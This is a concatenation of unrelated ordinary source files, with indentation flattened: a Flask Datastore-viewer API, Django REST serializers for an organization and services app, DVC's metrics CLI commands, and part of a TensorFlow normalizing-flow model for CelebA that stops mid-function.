"index": name in current_kind_properties,
})
return flask.jsonify({
'entityResults': entities_array,
'pageNumber': page_number,
'perPage': per_page,
'totalCount': total_count,
'properties': entity_properties,
})
def delete(self, project_name: str, kind: str):
data = flask.request.get_json()
repository = DatastoreViewerRepository(project_name=project_name)
keys = []
for key in data["url_safe_key"]:
key_path = json.loads(base64.b64decode(key))
keys.append(repository.build_key_by_flat_path(key_path=key_path))
repository.delete_multi(keys=keys)
return flask.jsonify({
'deleteResults': data["url_safe_key"]
})
class EntityAPIView(flask.views.MethodView):
def get(self, project_name: str, kind: str, url_safe_key: str):
encoder = DataStoreEntityJSONEncoder()
repository = DatastoreViewerRepository(project_name=project_name)
key_path = json.loads(base64.b64decode(url_safe_key))
key = repository.build_key_by_flat_path(key_path=key_path)
entity = repository.fetch_entity(key=key)
properties_by_kind = repository.fetch_parent_properties()
current_kind = kind
current_kind_properties = properties_by_kind.get(current_kind, [])
return flask.jsonify({
"entityResult":
encoder.encode(
entity=entity,
property_names=current_kind_properties
)
})
def delete(self, project_name: str, kind: str, url_safe_key: str):
encoder = DataStoreEntityJSONEncoder()
repository = DatastoreViewerRepository(project_name=project_name)
key_path = json.loads(base64.b64decode(url_safe_key))
key = repository.build_key_by_flat_path(key_path=key_path)
repository.delete(key=key)
return flask.jsonify({
"deleteResult": f'{url_safe_key}'
})
class KindAPIView(flask.views.MethodView):
def get(self, project_name: str):
repository = DatastoreViewerRepository(project_name=project_name)
properties_by_kind = repository.fetch_parent_properties()
kinds_json = defaultdict(list)
kinds_json['kindResults'] = []
for kind in properties_by_kind:
kind_properties = properties_by_kind.get(kind, [])
kind_dict = {
"kind": kind,
"indexed_properties": list(map(lambda x: {"property_name": x}, kind_properties))}
kinds_json['kindResults'].append(kind_dict)
return flask.jsonify(kinds_json)
class ProjectListAPIView(flask.views.MethodView):
def get(self):
return flask.jsonify({
"projectResult": {
"project_name": os.environ.get('GOOGLE_CLOUD_PROJECT', '')
}
})
class SampleDataAPIView(flask.views.MethodView):
@staticmethod
def _serialized_doc(doc) -> str:
doc_ = {}
for k, v in doc.items():
doc_[k] = repr(v)
return json.dumps(doc_, ensure_ascii=True, indent=4)
def post(self):
from google.cloud import datastore
client = get_client(project_name=os.environ.get('GOOGLE_CLOUD_PROJECT', ''))
user1 = datastore.Entity(key=client.key("User"))
user1.update({
"name": "User Name",
"float": 3.141592,
"int": 42,
"false": False,
"true": True,
"null": None,
"datetime": datetime.datetime.utcnow(),
})
user1["serialized"] = self._serialized_doc(user1)
client.put(user1)
user2 = datastore.Entity(key=client.key("User", str(uuid.uuid4())))
user2.update({
"full_name": "User Full Name",
"birthday": datetime.datetime.utcnow(),
})
user2["serialized"] = self._serialized_doc(user2)
client.put(user2)
profile1 = datastore.Entity(key=client.key("Profile"), exclude_from_indexes=("description",))
profile1.update({
"user_key": user2.key,
"description": "this is description text"
})
profile1["serialized"] = self._serialized_doc(profile1)
client.put(profile1)
bulk_objects = []
for i in range(100):
bulk = datastore.Entity(key=client.key("Bulk", str(uuid.uuid4())))
bulk.update({
"value": str(uuid.uuid4()),
"timestamp": datetime.datetime.utcnow(),
})
bulk["serialized"] = self._serialized_doc(bulk)
bulk_objects.append(bulk)
client.put_multi(bulk_objects)
setting = datastore.Entity(key=client.key("Setting", str(uuid.uuid4())), exclude_from_indexes=("value",))
setting.update({"value": "this is excluded from indexes"})
client.put(setting)
embedded = datastore.Entity(key=client.key("Embedded", str(uuid.uuid4())))
embedded.update({
"embedded_property": {
"name": "NAME",
"integer": 42,
"float": 3.141592,
"datetime": datetime.datetime.utcnow(),
}
})
embedded["serialized"] = self._serialized_doc(embedded)
client.put(embedded)
array = datastore.Entity(key=client.key("SampleArray", str(uuid.uuid4())))
array.update({
"string_array": ["this", "is", "a", "pen"],
"integer_array": [1, 2, 3, 5, 7, 11],
"float_array": [1.41421, 2.2362],
})
embedded["serialized"] = self._serialized_doc(array)
client.put(array)
new_kind = datastore.Entity(key=client.key(f"z{datetime.datetime.utcnow().strftime('%Y%m%d-%H%M%S')}"))
new_kind.update({"value": datetime.datetime.utcnow()})
client.put(new_kind)
return flask.jsonify({"ok": True})
|
the-stack_106_15878
|
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission
from django.db import transaction
from rest_framework import serializers
from .models import *
from Users.serializers import UserSerializer
from core.views import get_userData
class OrganizationSerializer(serializers.ModelSerializer):
creator = UserSerializer()
class Meta:
model = Organization
fields = ['id', 'name', 'description', 'address', 'creator',
'numbers', 'links', 'logo', 'created_at', 'updated_at']
class OrganizationCSerializer(serializers.ModelSerializer):
@transaction.atomic
def create(self, validated_data):
creator = get_user_model().objects.get(
id=get_userData(self.context['request'])['user_id'])
validated_data['creator'] = creator
organization = Organization.objects.create(**validated_data)
Organization_member.objects.create(
user=organization.creator,
organization=organization,
surname=organization.creator.surname,
first_name=organization.creator.first_name,
second_name=organization.creator.second_name,
email=organization.creator.email,
address=organization.creator.address,
phone=organization.creator.phone,
avatar=organization.creator.avatar
)
return organization
class Meta:
model = Organization
fields = ['name', 'description',
'address', 'links', 'numbers', 'logo']
class OrganizationUSerializer(serializers.ModelSerializer):
class Meta:
model = Organization
fields = ['name', 'description',
'address', 'links', 'numbers', 'logo']
class OrganizationMarketplaceSerializer(serializers.ModelSerializer):
id = serializers.IntegerField()
name = serializers.CharField(allow_null=True)
address = serializers.CharField(allow_null=True)
logo = serializers.CharField(allow_null=True)
class Meta:
model = Organization
fields = ['id', 'name', 'address', 'numbers', 'links', 'logo']
class Organization_memberSerializer(serializers.ModelSerializer):
user = UserSerializer()
organization = OrganizationSerializer()
class Meta:
model = Organization_member
fields = ['id', 'user', 'first_name', 'surname', 'second_name',
'address', 'phone', 'email', 'avatar', 'pass_series', 'pass_number', 'organization', 'created_at', 'updated_at']
class Organization_memberCSerializer(serializers.ModelSerializer):
def create(self, validated_data):
user_data = {
"first_name": validated_data['user'].first_name,
"surname": validated_data['user'].surname,
"second_name": validated_data['user'].second_name,
"phone": validated_data['user'].phone,
"email": validated_data['user'].email,
"address": validated_data['user'].address,
"avatar": validated_data['user'].avatar
}
organization_member = Organization_member.objects.create(
**validated_data, **user_data)
return organization_member
class Meta:
model = Organization_member
fields = ['user', 'organization']
class Organization_memberUSerializer(serializers.ModelSerializer):
user = UserSerializer(read_only = True)
class Meta:
model = Organization_member
fields = ['user', 'first_name', 'surname', 'second_name', 'address',
'phone', 'email', 'avatar', 'pass_series', 'pass_number']
class Organization_memberMarketplaceSerializer(serializers.ModelSerializer):
id = serializers.IntegerField()
surname = serializers.CharField(allow_null=True)
first_name = serializers.CharField(allow_null=True)
second_name = serializers.CharField(allow_null=True)
address = serializers.CharField(allow_null=True)
phone = serializers.CharField(allow_null=True)
email = serializers.CharField(allow_null=True)
avatar = serializers.CharField(allow_null=True)
pass_series = serializers.CharField(allow_null=True)
pass_number = serializers.CharField(allow_null=True)
class Meta:
model = Organization_member
fields = ['id', 'first_name', 'surname', 'second_name', 'address',
'phone', 'email', 'avatar', 'pass_series', 'pass_number']
class ServiceSerializer(serializers.ModelSerializer):
organization = OrganizationSerializer()
class Meta:
model = Service
fields = ['id', 'name', 'address', 'phone',
'organization', 'created_at', 'updated_at']
class ServiceCSerializer(serializers.ModelSerializer):
@transaction.atomic
def create(self, validated_data):
service = Service.objects.create(**validated_data)
members = Organization.objects.get(id = validated_data.get('organization').id).organization_members.all()
for m in members:
m.user.services = list(set(m.user.services + [service.id]))
m.user.save()
return service
class Meta:
model = Service
fields = ['name', 'address', 'phone', 'organization']
class ServiceUSerializer(serializers.ModelSerializer):
class Meta:
model = Service
fields = ['name', 'address', 'phone']
class ServiceMarketplaceSerializer(serializers.ModelSerializer):
id = serializers.IntegerField()
name = serializers.CharField(allow_null=True)
address = serializers.CharField(allow_null=True)
phone = serializers.CharField(allow_null = True)
class Meta:
model = Service
fields = ['id', 'name', 'address', 'phone']
class MProviderSerializer(serializers.ModelSerializer):
organization = OrganizationSerializer()
service = ServiceSerializer()
class MProviderCSerializer(serializers.ModelSerializer):
token = serializers.CharField(max_length=300, read_only=True)
def create(self, validated_data):
mprovider = MProvider.objects.create(**validated_data)
validated_data['token'] = mprovider.generate_token
return validated_data
class Meta:
model = MProvider
fields = ['token', 'site', 'service', 'organization']
class Meta:
model = MProvider
fields = ['id', 'site', 'service',
'organization', 'created_at', 'updated_at']
class PermissionSerializer(serializers.ModelSerializer):
class Meta:
model = Permission
fields = ['id', 'name', 'content_type', 'codename']
class MyGroupSerializer(serializers.ModelSerializer):
organization = OrganizationSerializer()
service = ServiceSerializer()
permissions = PermissionSerializer(many = True)
class Meta:
model = MyGroup
fields = ['id', 'name', 'permissions',
'organization', 'service']
class MyGroupCSerializer(serializers.ModelSerializer):
def create(self, validated_data):
mygroup = MyGroup.objects.create(**validated_data)
return mygroup
class Meta:
model = MyGroup
fields = ['id', 'name', 'permissions',
'organization', 'service']
class MyGroupUSerializer(serializers.ModelSerializer):
class Meta:
model = MyGroup
fields = ['id', 'name', 'permissions',
'organization', 'service']
|
the-stack_106_15879
|
import argparse
import logging
from dvc.command.base import append_doc_link
from dvc.command.base import CmdBase
from dvc.command.base import fix_subparsers
from dvc.exceptions import BadMetricError
from dvc.exceptions import DvcException
logger = logging.getLogger(__name__)
def show_metrics(metrics, all_branches=False, all_tags=False):
"""
Args:
metrics (list): Where each element is either a `list`
if an xpath was specified, otherwise a `str`
"""
# When `metrics` contains a `None` key, it means that some files
# specified as `targets` in `repo.metrics.show` didn't contain any metrics.
missing = metrics.pop(None, None)
for branch, val in metrics.items():
if all_branches or all_tags:
logger.info("{branch}:".format(branch=branch))
for fname, metric in val.items():
if isinstance(metric, dict):
lines = list(metric.values())
elif isinstance(metric, list):
lines = metric
else:
lines = metric.splitlines()
if len(lines) > 1:
logger.info("\t{fname}:".format(fname=fname))
for line in lines:
logger.info("\t\t{content}".format(content=line))
else:
logger.info("\t{}: {}".format(fname, metric))
if missing:
raise BadMetricError(missing)
class CmdMetricsShow(CmdBase):
def run(self):
try:
metrics = self.repo.metrics.show(
self.args.targets,
typ=self.args.type,
xpath=self.args.xpath,
all_branches=self.args.all_branches,
all_tags=self.args.all_tags,
recursive=self.args.recursive,
)
show_metrics(metrics, self.args.all_branches, self.args.all_tags)
except DvcException:
logger.exception("failed to show metrics")
return 1
return 0
class CmdMetricsModify(CmdBase):
def run(self):
try:
self.repo.metrics.modify(
self.args.path, typ=self.args.type, xpath=self.args.xpath
)
except DvcException:
logger.exception("failed to modify metric file settings")
return 1
return 0
class CmdMetricsAdd(CmdBase):
def run(self):
try:
self.repo.metrics.add(
self.args.path, self.args.type, self.args.xpath
)
except DvcException:
msg = "failed to add metric file '{}'".format(self.args.path)
logger.exception(msg)
return 1
return 0
class CmdMetricsRemove(CmdBase):
def run(self):
try:
self.repo.metrics.remove(self.args.path)
except DvcException:
msg = "failed to remove metric file '{}'".format(self.args.path)
logger.exception(msg)
return 1
return 0
def _show_diff(diff):
from texttable import Texttable
if not diff:
return "No changes."
table = Texttable()
# remove borders to make it easier for users to copy stuff
table.set_chars(("", "", "", ""))
table.set_deco(0)
rows = [["Path", "Metric", "Value", "Change"]]
for fname, mdiff in diff.items():
for metric, change in mdiff.items():
rows.append(
[
fname,
metric,
change["new"],
change.get("diff", "diff not supported"),
]
)
table.add_rows(rows)
return table.draw()
class CmdMetricsDiff(CmdBase):
def run(self):
try:
diff = self.repo.metrics.diff(
a_rev=self.args.a_rev,
b_rev=self.args.b_rev,
targets=self.args.targets,
typ=self.args.type,
xpath=self.args.xpath,
recursive=self.args.recursive,
)
if self.args.show_json:
import json
logger.info(json.dumps(diff))
else:
logger.info(_show_diff(diff))
except DvcException:
logger.exception("failed to show metrics diff")
return 1
return 0
def add_parser(subparsers, parent_parser):
METRICS_HELP = "Commands to add, manage, collect, and display metrics."
metrics_parser = subparsers.add_parser(
"metrics",
parents=[parent_parser],
description=append_doc_link(METRICS_HELP, "metrics"),
help=METRICS_HELP,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
metrics_subparsers = metrics_parser.add_subparsers(
dest="cmd",
help="Use `dvc metrics CMD --help` to display command-specific help.",
)
fix_subparsers(metrics_subparsers)
METRICS_SHOW_HELP = "Print metrics, with optional formatting."
metrics_show_parser = metrics_subparsers.add_parser(
"show",
parents=[parent_parser],
description=append_doc_link(METRICS_SHOW_HELP, "metrics/show"),
help=METRICS_SHOW_HELP,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
metrics_show_parser.add_argument(
"targets",
nargs="*",
help="Metric files or directories (see -R) to show",
)
metrics_show_parser.add_argument(
"-t",
"--type",
help=(
"Type of metrics (json/tsv/htsv/csv/hcsv). "
"It can be detected by the file extension automatically. "
"Unsupported types will be treated as raw."
),
)
metrics_show_parser.add_argument(
"-x", "--xpath", help="json/tsv/htsv/csv/hcsv path."
)
metrics_show_parser.add_argument(
"-a",
"--all-branches",
action="store_true",
default=False,
help="Show metrics for all branches.",
)
metrics_show_parser.add_argument(
"-T",
"--all-tags",
action="store_true",
default=False,
help="Show metrics for all tags.",
)
metrics_show_parser.add_argument(
"-R",
"--recursive",
action="store_true",
default=False,
help=(
"If any target is a directory, recursively search and process "
"metric files."
),
)
metrics_show_parser.set_defaults(func=CmdMetricsShow)
METRICS_ADD_HELP = "Mark a DVC-tracked file as a metric."
metrics_add_parser = metrics_subparsers.add_parser(
"add",
parents=[parent_parser],
description=append_doc_link(METRICS_ADD_HELP, "metrics/add"),
help=METRICS_ADD_HELP,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
metrics_add_parser.add_argument(
"-t", "--type", help="Type of metrics (raw/json/tsv/htsv/csv/hcsv)."
)
metrics_add_parser.add_argument(
"-x", "--xpath", help="json/tsv/htsv/csv/hcsv path."
)
metrics_add_parser.add_argument("path", help="Path to a metric file.")
metrics_add_parser.set_defaults(func=CmdMetricsAdd)
METRICS_MODIFY_HELP = "Modify metric default formatting."
metrics_modify_parser = metrics_subparsers.add_parser(
"modify",
parents=[parent_parser],
description=append_doc_link(METRICS_MODIFY_HELP, "metrics/modify"),
help=METRICS_MODIFY_HELP,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
metrics_modify_parser.add_argument(
"-t", "--type", help="Type of metrics (raw/json/tsv/htsv/csv/hcsv)."
)
metrics_modify_parser.add_argument(
"-x", "--xpath", help="json/tsv/htsv/csv/hcsv path."
)
metrics_modify_parser.add_argument("path", help="Path to a metric file.")
metrics_modify_parser.set_defaults(func=CmdMetricsModify)
METRICS_REMOVE_HELP = "Remove metric mark on a DVC-tracked file."
metrics_remove_parser = metrics_subparsers.add_parser(
"remove",
parents=[parent_parser],
description=append_doc_link(METRICS_REMOVE_HELP, "metrics/remove"),
help=METRICS_REMOVE_HELP,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
metrics_remove_parser.add_argument("path", help="Path to a metric file.")
metrics_remove_parser.set_defaults(func=CmdMetricsRemove)
METRICS_DIFF_HELP = "Show changes in metrics between commits"
" in the DVC repository, or between a commit and the workspace."
metrics_diff_parser = metrics_subparsers.add_parser(
"diff",
parents=[parent_parser],
description=append_doc_link(METRICS_DIFF_HELP, "metrics/diff"),
help=METRICS_DIFF_HELP,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
metrics_diff_parser.add_argument(
"a_rev", nargs="?", help="Old Git commit to compare (defaults to HEAD)"
)
metrics_diff_parser.add_argument(
"b_rev",
nargs="?",
help=("New Git commit to compare (defaults to the current workspace)"),
)
metrics_diff_parser.add_argument(
"--targets",
nargs="*",
help=(
"Metric files or directories (see -R) to show diff for. "
"Shows diff for all metric files by default."
),
)
metrics_diff_parser.add_argument(
"-t",
"--type",
help=(
"Type of metrics (json/tsv/htsv/csv/hcsv). "
"It can be detected by the file extension automatically. "
"Unsupported types will be treated as raw."
),
)
metrics_diff_parser.add_argument(
"-x", "--xpath", help="json/tsv/htsv/csv/hcsv path."
)
metrics_diff_parser.add_argument(
"-R",
"--recursive",
action="store_true",
default=False,
help=(
"If any target is a directory, recursively search and process "
"metric files."
),
)
metrics_diff_parser.add_argument(
"--show-json",
action="store_true",
default=False,
help="Show output in JSON format.",
)
metrics_diff_parser.set_defaults(func=CmdMetricsDiff)
|
the-stack_106_15880
|
"""
Num params: 122790952
Run it as: mpiexec -n {num_processes} python3.6 -m flows_celeba.launchers.celeba128_5bit_official from the flows master directory of the git repo.
num_processes=8 was used for this launcher on a 8-GPU (1080 Ti) machine with 40 GB RAM.
If you want to use python3.5, remove the f string in the logdir.
"""
import numpy as np
import tensorflow as tf
from tensorflow.distributions import Normal
from tqdm import tqdm
from flows_imagenet.logistic import mixlogistic_logpdf, mixlogistic_logcdf, mixlogistic_invcdf
from flows_celeba import flow_training_celeba
DEFAULT_FLOATX = tf.float32
STORAGE_FLOATX = tf.float32
def to_default_floatx(x):
return tf.cast(x, DEFAULT_FLOATX)
def at_least_float32(x):
assert x.dtype in [tf.float16, tf.float32, tf.float64]
if x.dtype == tf.float16:
return tf.cast(x, tf.float32)
return x
def get_var(var_name, *, ema, initializer, trainable=True, **kwargs):
"""forced storage dtype"""
assert 'dtype' not in kwargs
if isinstance(initializer, np.ndarray):
initializer = initializer.astype(STORAGE_FLOATX.as_numpy_dtype)
v = tf.get_variable(var_name, dtype=STORAGE_FLOATX, initializer=initializer, trainable=trainable, **kwargs)
if ema is not None:
assert isinstance(ema, tf.train.ExponentialMovingAverage)
v = ema.average(v)
return v
def _norm(x, *, axis, g, b, e=1e-5):
assert x.shape.ndims == g.shape.ndims == b.shape.ndims
u = tf.reduce_mean(x, axis=axis, keepdims=True)
s = tf.reduce_mean(tf.squared_difference(x, u), axis=axis, keepdims=True)
x = (x - u) * tf.rsqrt(s + e)
return x * g + b
def norm(x, *, name, ema):
"""Layer norm over last axis"""
with tf.variable_scope(name):
dim = int(x.shape[-1])
_g = get_var('g', ema=ema, shape=[dim], initializer=tf.constant_initializer(1))
_b = get_var('b', ema=ema, shape=[dim], initializer=tf.constant_initializer(0))
g, b = map(to_default_floatx, [_g, _b])
bcast_shape = [1] * (x.shape.ndims - 1) + [dim]
return _norm(x, g=tf.reshape(g, bcast_shape), b=tf.reshape(b, bcast_shape), axis=-1)
def int_shape(x):
return list(map(int, x.shape.as_list()))
def sumflat(x):
return tf.reduce_sum(tf.reshape(x, [x.shape[0], -1]), axis=1)
def inverse_sigmoid(x):
return -tf.log(tf.reciprocal(x) - 1.)
def init_normalization(x, *, name, init_scale=1., init, ema):
with tf.variable_scope(name):
g = get_var('g', shape=x.shape[1:], initializer=tf.constant_initializer(1.), ema=ema)
b = get_var('b', shape=x.shape[1:], initializer=tf.constant_initializer(0.), ema=ema)
if init:
# data based normalization
m_init, v_init = tf.nn.moments(x, [0])
scale_init = init_scale * tf.rsqrt(v_init + 1e-8)
assert m_init.shape == v_init.shape == scale_init.shape == g.shape == b.shape
with tf.control_dependencies([
g.assign(scale_init),
b.assign(-m_init * scale_init)
]):
g, b = tf.identity_n([g, b])
return g, b
def dense(x, *, name, num_units, init_scale=1., init, ema):
with tf.variable_scope(name):
_, in_dim = x.shape
W = get_var('W', shape=[in_dim, num_units], initializer=tf.random_normal_initializer(0, 0.05), ema=ema)
b = get_var('b', shape=[num_units], initializer=tf.constant_initializer(0.), ema=ema)
if init:
y = tf.matmul(x, W)
m_init, v_init = tf.nn.moments(y, [0])
scale_init = init_scale * tf.rsqrt(v_init + 1e-8)
with tf.control_dependencies([
W.assign(W * scale_init[None, :]),
b.assign(-m_init * scale_init),
]):
x = tf.identity(x)
return tf.nn.bias_add(tf.matmul(x, W), b)
def conv2d(x, *, name, num_units, filter_size=(3, 3), stride=(1, 1), pad='SAME', init_scale=1., init, ema):
with tf.variable_scope(name):
assert x.shape.ndims == 4
W = get_var('W', shape=[*filter_size, int(x.shape[-1]), num_units],
initializer=tf.random_normal_initializer(0, 0.05), ema=ema)
b = get_var('b', shape=[num_units], initializer=tf.constant_initializer(0.), ema=ema)
if init:
y = tf.nn.conv2d(x, W, [1, *stride, 1], pad)
m_init, v_init = tf.nn.moments(y, [0, 1, 2])
scale_init = init_scale * tf.rsqrt(v_init + 1e-8)
with tf.control_dependencies([
W.assign(W * scale_init[None, None, None, :]),
b.assign(-m_init * scale_init),
]):
x = tf.identity(x)
return tf.nn.bias_add(tf.nn.conv2d(x, W, [1, *stride, 1], pad), b)
def nin(x, *, num_units, **kwargs):
assert 'num_units' not in kwargs
s = x.shape.as_list()
x = tf.reshape(x, [np.prod(s[:-1]), s[-1]])
x = dense(x, num_units=num_units, **kwargs)
return tf.reshape(x, s[:-1] + [num_units])
def matmul_last_axis(x, w):
_, out_dim = w.shape
s = x.shape.as_list()
x = tf.reshape(x, [np.prod(s[:-1]), s[-1]])
x = tf.matmul(x, w)
return tf.reshape(x, s[:-1] + [out_dim])
def concat_elu(x, *, axis=-1):
return tf.nn.elu(tf.concat([x, -x], axis=axis))
def gate(x, *, axis):
a, b = tf.split(x, 2, axis=axis)
return a * tf.sigmoid(b)
def gated_resnet(x, *, name, a, nonlinearity=concat_elu, conv=conv2d, use_nin, init, ema, dropout_p):
with tf.variable_scope(name):
num_filters = int(x.shape[-1])
c1 = conv(nonlinearity(x), name='c1', num_units=num_filters, init=init, ema=ema)
if a is not None: # add short-cut connection if auxiliary input 'a' is given
c1 += nin(nonlinearity(a), name='a_proj', num_units=num_filters, init=init, ema=ema)
c1 = nonlinearity(c1)
if dropout_p > 0:
c1 = tf.nn.dropout(c1, keep_prob=1. - dropout_p)
c2 = (nin if use_nin else conv)(c1, name='c2', num_units=num_filters * 2, init_scale=0.1, init=init, ema=ema)
return x + gate(c2, axis=3)
def attn(x, *, name, pos_emb, heads, init, ema, dropout_p):
with tf.variable_scope(name):
bs, height, width, ch = x.shape.as_list()
assert pos_emb.shape == [height, width, ch]
assert ch % heads == 0
timesteps = height * width
dim = ch // heads
# Position embeddings
c = x + pos_emb[None, :, :, :]
# b, h, t, d == batch, num heads, num timesteps, per-head dim (C // heads)
c = nin(c, name='proj1', num_units=3 * ch, init=init, ema=ema)
assert c.shape == [bs, height, width, 3 * ch]
# Split into heads / Q / K / V
c = tf.reshape(c, [bs, timesteps, 3, heads, dim]) # b, t, 3, h, d
c = tf.transpose(c, [2, 0, 3, 1, 4]) # 3, b, h, t, d
q_bhtd, k_bhtd, v_bhtd = tf.unstack(c, axis=0)
assert q_bhtd.shape == k_bhtd.shape == v_bhtd.shape == [bs, heads, timesteps, dim]
# Attention
w_bhtt = tf.matmul(q_bhtd, k_bhtd, transpose_b=True) / np.sqrt(float(dim))
w_bhtt = tf.cast(tf.nn.softmax(at_least_float32(w_bhtt)), dtype=x.dtype)
assert w_bhtt.shape == [bs, heads, timesteps, timesteps]
a_bhtd = tf.matmul(w_bhtt, v_bhtd)
# Merge heads
a_bthd = tf.transpose(a_bhtd, [0, 2, 1, 3])
assert a_bthd.shape == [bs, timesteps, heads, dim]
a_btc = tf.reshape(a_bthd, [bs, timesteps, ch])
# Project
c1 = tf.reshape(a_btc, [bs, height, width, ch])
if dropout_p > 0:
c1 = tf.nn.dropout(c1, keep_prob=1. - dropout_p)
c2 = nin(c1, name='proj2', num_units=ch * 2, init_scale=0.1, init=init, ema=ema)
return x + gate(c2, axis=3)
class Flow:
def forward(self, x, **kwargs):
raise NotImplementedError
def backward(self, y, **kwargs):
raise NotImplementedError
class Inverse(Flow):
def __init__(self, base_flow):
self.base_flow = base_flow
def forward(self, x, **kwargs):
return self.base_flow.inverse(x, **kwargs)
def inverse(self, y, **kwargs):
return self.base_flow.forward(y, **kwargs)
class Compose(Flow):
def __init__(self, flows):
self.flows = flows
def _maybe_tqdm(self, iterable, desc, verbose):
return tqdm(iterable, desc=desc) if verbose else iterable
def forward(self, x, **kwargs):
bs = int((x[0] if isinstance(x, tuple) else x).shape[0])
logd_terms = []
for i, f in enumerate(self._maybe_tqdm(self.flows, desc='forward {}'.format(kwargs),
verbose=kwargs.get('verbose'))):
assert isinstance(f, Flow)
x, l = f.forward(x, **kwargs)
if l is not None:
assert l.shape == [bs]
logd_terms.append(l)
return x, tf.add_n(logd_terms) if logd_terms else tf.constant(0.)
def inverse(self, y, **kwargs):
bs = int((y[0] if isinstance(y, tuple) else y).shape[0])
logd_terms = []
for i, f in enumerate(
self._maybe_tqdm(self.flows[::-1], desc='inverse {}'.format(kwargs), verbose=kwargs.get('verbose'))):
assert isinstance(f, Flow)
y, l = f.inverse(y, **kwargs)
if l is not None:
assert l.shape == [bs]
logd_terms.append(l)
return y, tf.add_n(logd_terms) if logd_terms else tf.constant(0.)
class ImgProc(Flow):
def forward(self, x, **kwargs):
x = x * (.9 / 32) + .05 # [0, 32] -> [.05, .95]
x = -tf.log(1. / x - 1.) # inverse sigmoid
logd = np.log(.9 / 32) + tf.nn.softplus(x) + tf.nn.softplus(-x)
logd = tf.reduce_sum(tf.reshape(logd, [int_shape(logd)[0], -1]), 1)
return x, logd
def inverse(self, y, **kwargs):
y = tf.sigmoid(y)
logd = tf.log(y) + tf.log(1. - y)
y = (y - .05) / (.9 / 32) # [.05, .95] -> [0, 32]
logd -= np.log(.9 / 32)
logd = tf.reduce_sum(tf.reshape(logd, [int_shape(logd)[0], -1]), 1)
return y, logd
class TupleFlip(Flow):
def forward(self, x, **kwargs):
assert isinstance(x, tuple)
a, b = x
return (b, a), None
def inverse(self, y, **kwargs):
assert isinstance(y, tuple)
a, b = y
return (b, a), None
class SpaceToDepth(Flow):
def __init__(self, block_size=2):
self.block_size = block_size
def forward(self, x, **kwargs):
return tf.space_to_depth(x, self.block_size), None
def inverse(self, y, **kwargs):
return tf.depth_to_space(y, self.block_size), None
class CheckerboardSplit(Flow):
def forward(self, x, **kwargs):
assert isinstance(x, tf.Tensor)
B, H, W, C = x.shape
x = tf.reshape(x, [B, H, W // 2, 2, C])
a, b = tf.unstack(x, axis=3)
assert a.shape == b.shape == [B, H, W // 2, C]
return (a, b), None
def inverse(self, y, **kwargs):
assert isinstance(y, tuple)
a, b = y
assert a.shape == b.shape
B, H, W_half, C = a.shape
x = tf.stack([a, b], axis=3)
assert x.shape == [B, H, W_half, 2, C]
return tf.reshape(x, [B, H, W_half * 2, C]), None
class ChannelSplit(Flow):
def forward(self, x, **kwargs):
assert isinstance(x, tf.Tensor)
assert len(x.shape) == 4 and x.shape[3] % 2 == 0
return tuple(tf.split(x, 2, axis=3)), None
def inverse(self, y, **kwargs):
assert isinstance(y, tuple)
a, b = y
return tf.concat([a, b], axis=3), None
class Sigmoid(Flow):
def forward(self, x, **kwargs):
y = tf.sigmoid(x)
logd = -tf.nn.softplus(x) - tf.nn.softplus(-x)
return y, sumflat(logd)
def inverse(self, y, **kwargs):
x = inverse_sigmoid(y)
logd = -tf.log(y) - tf.log(1. - y)
return x, sumflat(logd)
class Norm(Flow):
def __init__(self, init_scale=1.):
def f(input_, forward, init, ema):
assert not isinstance(input_, list)
if isinstance(input_, tuple):
is_tuple = True
else:
assert isinstance(input_, tf.Tensor)
input_ = [input_]
is_tuple = False
bs = int(input_[0].shape[0])
g_and_b = []
for (i, x) in enumerate(input_):
g, b = init_normalization(x, name='norm{}'.format(i), init_scale=init_scale, init=init, ema=ema)
g = tf.maximum(g, 1e-10)
assert x.shape[0] == bs and g.shape == b.shape == x.shape[1:]
g_and_b.append((g, b))
logd = tf.fill([bs], tf.add_n([tf.reduce_sum(tf.log(g)) for (g, _) in g_and_b]))
if forward:
out = [x * g[None] + b[None] for (x, (g, b)) in zip(input_, g_and_b)]
else:
out = [(x - b[None]) / g[None] for (x, (g, b)) in zip(input_, g_and_b)]
logd = -logd
if not is_tuple:
assert len(out) == 1
return out[0], logd
return tuple(out), logd
self.template = tf.make_template(self.__class__.__name__, f)
def forward(self, x, init=False, ema=None, **kwargs):
return self.template(x, forward=True, init=init, ema=ema)
def inverse(self, y, init=False, ema=None, **kwargs):
return self.template(y, forward=False, init=init, ema=ema)
class MixLogisticCoupling(Flow):
"""
CDF of mixture of logistics, followed by affine
"""
def __init__(self, filters, blocks, use_nin, components, attn_heads, use_ln,
with_affine=True, use_final_nin=False, init_scale=0.1, nonlinearity=concat_elu):
self.components = components
self.with_affine = with_affine
self.scale_flow = Inverse(Sigmoid())
def f(x, init, ema, dropout_p, verbose, context):
# if verbose and context is not None:
# print('got context')
if init and verbose:
# debug stuff
with tf.variable_scope('debug'):
xmean, xvar = tf.nn.moments(x, axes=list(range(len(x.get_shape()))))
x = tf.Print(
x,
[
tf.shape(x), xmean, tf.sqrt(xvar), tf.reduce_min(x), tf.reduce_max(x),
tf.reduce_any(tf.is_nan(x)), tf.reduce_any(tf.is_inf(x))
],
message='{} (shape/mean/std/min/max/nan/inf) '.format(self.template.variable_scope.name),
summarize=10,
)
B, H, W, C = x.shape.as_list()
pos_emb = to_default_floatx(get_var(
'pos_emb', ema=ema, shape=[H, W, filters], initializer=tf.random_normal_initializer(stddev=0.01),
))
x = conv2d(x, name='c1', num_units=filters, init=init, ema=ema)
for i_block in range(blocks):
with tf.variable_scope('block{}'.format(i_block)):
x = gated_resnet(
x, name='conv', a=context, use_nin=use_nin, init=init, ema=ema, dropout_p=dropout_p
)
if use_ln:
x = norm(x, name='ln1', ema=ema)
x = nonlinearity(x)
x = (nin if use_final_nin else conv2d)(
x, name='c2', num_units=C * (2 + 3 * components), init_scale=init_scale, init=init, ema=ema
)
assert x.shape == [B, H, W, C * (2 + 3 * components)]
x = tf.reshape(x, [B, H, W, C, 2 + 3 * components])
x = at_least_float32(x) # do mix-logistics in tf.float32
s, t = tf.tanh(x[:, :, :, :, 0]), x[:, :, :, :, 1]
ml_logits, ml_means, ml_logscales = tf.split(x[:, :, :, :, 2:], 3, axis=4)
